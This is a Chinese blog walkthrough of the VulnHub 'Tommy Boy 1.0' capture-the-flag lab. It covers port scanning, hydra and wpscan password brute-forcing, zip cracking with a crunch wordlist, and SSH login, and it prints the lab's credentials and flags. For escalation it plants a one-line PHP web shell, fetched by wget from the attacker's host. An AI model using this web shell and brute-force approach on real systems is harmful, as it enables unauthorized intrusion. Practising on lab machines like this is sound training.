vulnhub靶机-TommyBoy1dot0

vulnhub-TommyBoy1dot0

知识点

信息收集*

火狐插件修改user-agent为iphone

提权(更换低权限用户组)

Description

=================

圣施耐克!汤米男孩需要您的帮助!

Callahan Auto公司终于进入了现代技术领域,并建立了一个Web服务器供其客户用于订购刹车片。

不幸的是,该网站刚刚瘫痪,唯一拥有管理员凭据的人是Tom Callahan Sr.-刚刚去世!更糟糕的是,唯一一个了解服务器的人退出了!

您需要帮助Tom Jr.,Richard和Michelle再次恢复该网页。否则,卡拉汉汽车公司肯定会倒闭:-(


Objective

=================

主要目的是将主页的备份副本还原到Callahan Auto的服务器。但是,要考虑将箱子完全塞满,您将需要收集散布在系统上的5个标志,并使用其中的数据来解锁一条最终消息。

环境搭建

下载ova文件,导入虚拟机即可
下载地址:https://www.vulnhub.com/entry/tommy-boy-1,157/

———————-

信息收集

主机发现

1
nmap -sP 192.168.211.1/24

1592447825931

靶机ip为192.168.211.159

端口扫描

1
nmap -A 192.168.211.159 -p 1-65535

1592451324025

开放了22、80、8008三个端口
访问一下80端口
1592451394042

目录扫描

flag1

发现robots.txt,里面发现第一个flag的目录
1592451787319

之后返回首页查看网页源码,发现一个视频地址
1592463697415

1592463718365

看wp居然prehistoricforest/是个目录,长见识了
访问prehistoricforest,是一个博客系统

flag2

在最后一个posts中发现flag2
1592463981583

1592463999330

之后在另一篇博客中发现了一个目录
1592464604218

访问可以发现一张图片,下载下来使用编辑器查看可以发现一串md5
1592464686735

ce154b5a8e59c89732bc25d6a2e6b90b
解码的到spanky
1592464785947

这是一篇加密文章的密码,访问该加密文章
在文章中发现nickburns用户
1592465063411

根据说明,靶机开放了一个ftp端口,但是每隔15分钟都会关闭,通过nmap扫描得到ftp端口为65534
1592465776781

使用hydra爆破一下

1
hydra ftp://192.168.211.160:65534 -l nickburns -e ns

得到用户名和密码一样

1592466001305

使用ftp登陆,发现一个readme.txt文件,将其下到本地查看
1592466449357

1592466627906

提示将一个压缩包放到了NickIzL33t目录,但是访问却什么都没有发现,这是想起还有一个8008端口,访问
1592469708386

显示Steve Jobs可以查看内容,这是需要安装user-agent插件
1592470988271

访问成功,但是显示存在一个html隐藏文件,需要找到他
1592471290637

这里可以通过爆破来寻找该html文件,使用dirbuster工具
1592471489742

在这之前要设置user-agent为iphone
1592471734144

1592472233222

得到/fallon1.html,访问一下,发现第三个flag

flag3

1592472278055

还有一个hint
1592472395305

英语不好~~

1592472613453

再将第三个提示下载下来,是一个加密的压缩包,根据第一个提示进行爆破

1
2
3
4
5
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

使用crunch工具生成字典

-t 命令如下:

  • -t @,%^,指定模式,@,%^分别代表意义如下:

  • @ 插入小写字母

  • , 插入大写字母

  • % 插入数字

  • ^ 插入特殊符号

1
crunch 13 13 -t bev,%%@@^1995 -o zippass.txt

1592490055107

之后使用工具爆破
1592490373628

密码为bevH00tr$1995,打开压缩包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

提示密码fatguyinalittlecoat后面还有一些数字
之后扫描一下网站,发现为wordpress网站
使用wpscan进行利用
1592491780668

1
wpscan --url http://192.168.211.160/prehistoricforest/ -e u

1592491816554

根据压缩文件里面的信息,应该是要登陆tom这个用户,使用wpscan进行爆破

1
wpscan --url http://192.168.211.160/prehistoricforest -P /usr/share/wordlists/rockyou.txt -U tom

爆破得到密码为tomtom1
1592492618601

之后登陆后台,在posts里面发现密码后半部分
1592492729587

Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

getshell

使用ssh连接之后getshell

1
ssh 192.168.211.160 -u bigtommysenior

flag4

登陆之后发现flag4
1592492929769

还有一个备份文件,将备份文件cp到index,html 里面

1
cp callahanbak.bak /var/www/html/index.html

网站能成功访问

1592493628244

之后便是提权

提权

根据flag4里面的提示,我们需要读取5.txt里面的内容,在根目录下发现了.5.txt文件,但是由于属于www-data用户组,所以并没有权限读取

1592536963450

之后发现
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads目录,可以进行文件上传,里面后一个.htaccess文件,可以将gif文件当做PHP来执行

1592537081486

但是上传一个一句话木马并不能连接,所以尝试直接写入一句话

可以其将$_GET,$_POST和一些函数过滤了
1592537564970

这时可以考虑从攻击机上下载文件到该目录

开启一个http端口
python -m SimpleHTTPServer 8080

写一个一句话文件
<?php system($_GET[a]);?> #这里使用eval($_GET[a])没有成功

之后将其下载保存即可

1
>wget http://192.168.211.151:8080/shell.php -O shell.php

1592537768246

访问为www-data 用户组,可以读取.5.txt文件

flag5

1592537893468

最后将5个flag拼接便是压缩包LOOT.zip的密码
B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
1592538002408

这一个靶机主要考察的就是信息收集,信息收集还是很重要的。做个靶机还有剧情,也是非常有趣的!

文章作者:CyzCc
最后更新:2020年06月23日 18:06:49
原始链接:https://cyzcc.vip/2020/06/23/vulnhub-TommyBoy1dot0/
版权声明:转载请注明出处!
您的支持就是我的动力!
-------------    本文结束  感谢您的阅读    -------------